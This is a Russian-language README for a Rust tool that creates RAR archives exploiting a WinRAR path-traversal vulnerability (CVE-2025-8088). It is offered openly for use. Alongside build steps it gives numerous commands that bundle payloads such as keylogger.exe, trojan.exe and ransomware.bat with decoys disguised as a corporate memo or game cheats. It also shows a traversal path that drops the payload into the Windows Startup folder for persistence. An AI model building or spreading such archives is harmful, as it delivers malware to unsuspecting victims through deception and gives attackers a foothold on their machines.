
Высокопроизводительная, безопасная по памяти реализация инструмента эксплойта WinRAR CVE-2025-8088, переписанная на Rust для повышения надежности и производительности.
Продвинутый инструмент эксплуатации Path Traversal в WinRAR — на Rust
Высокопроизводительная, безопасная с точки зрения памяти реализация эксплойта WinRAR CVE-2025-8088, переписанная на Rust для лучшей надёжности и производительности.
# Установка Rust через rustup
# Проверка установки
rustc --version
cargo --version
# Используя vcpkg
vcpkg install gtk:x64-windows
pacman -S mingw-w64-x86_64-gtk4
# Перейдите в каталог проекта Rust
cd winrar_exploit_rust
# Сборка в режиме отладки
cargo build
# Сборка оптимизированного релиза
cargo build --release
# Запуск приложения
cargo run --release
Создание простого эксплойта с полезной нагрузкой и файлом-приманкой:
# Создание эксплойта с исполняемой полезной нагрузкой
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"
# Создание эксплойта со скриптом в качестве полезной нагрузки
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
# Использование нескольких приманок, разделённых запятыми
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
# Укажите пользовательский каталог, куда будет помещена полезная нагрузка
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
# Полезная нагрузка в виде изображения (стеганография)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"
# Полезная нагрузка в формате PDF
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"
# Полезная нагрузка в виде пакетного скрипта
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
# Запуск системной диагностики для проверки совместимости
.\winrar_exploit_rust.exe diagnose
# Показать доступные инструменты и функции
.\winrar_exploit_rust.exe tools
# Создание вредоносного документа, выглядящего как корпоративная служебная записка
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
# Сокрытие вредоносного ПО в файле читов для игр
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
Инструмент создаёт архивы RAR с path traversal, используя:
Пример пути: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
winrar_exploit_rust/
├── src/
│ ├── main.rs # Точка входа приложения
│ ├── gui.rs # Пользовательский интерфейс на GTK
│ ├── exploit.rs # Основная логика эксплойта
│ ├── ads.rs # Манипуляция ADS в NTFS
│ ├── rar.rs # Манипуляция заголовками RAR5
│ ├── diagnostics.rs # Системная диагностика
│ └── error.rs # Обработка ошибок
├── Cargo.toml # Зависимости и конфигурация сборки
└── README.md # Этот файл
Инструмент включает автоматическую диагностику, которая проверяет:
"GTK не найден"
# Установите библиотеки разработки GTK
# Windows (vcpkg)
vcpkg install gtk:x64-windows
# Или через MSYS2
pacman -S mingw-w64-x86_64-gtk4
"WinRAR CLI не найден"
rar.exe находится в Program Files"Не удаётся записать в каталог автозагрузки"
"ADS в NTFS не поддерживается"
Ошибки компиляции
# Обновите набор инструментов Rust
rustup update
# Очистите и пересоберите
cargo clean
cargo build --release
# Форматирование кода
cargo fmt
# Проверка кода линтером
cargo clippy
Ключевые зависимости включают:
gtk — Современный GUI-фреймворкtokio — Асинхронная среда выполненияwindows — Привязки Windows APIcrc32fast — Быстрый расчёт CRC32byteorder — Манипуляции с порядком байтовanyhow — Обработка ошибокЭтот проект лицензирован под лицензией MIT — подробности см. в файле LICENSE.
Сделано @kanonufo в Telegram
Высокопроизводительный инструмент красной команды для эксплуатации CVE-2025-8088 — Rust Edition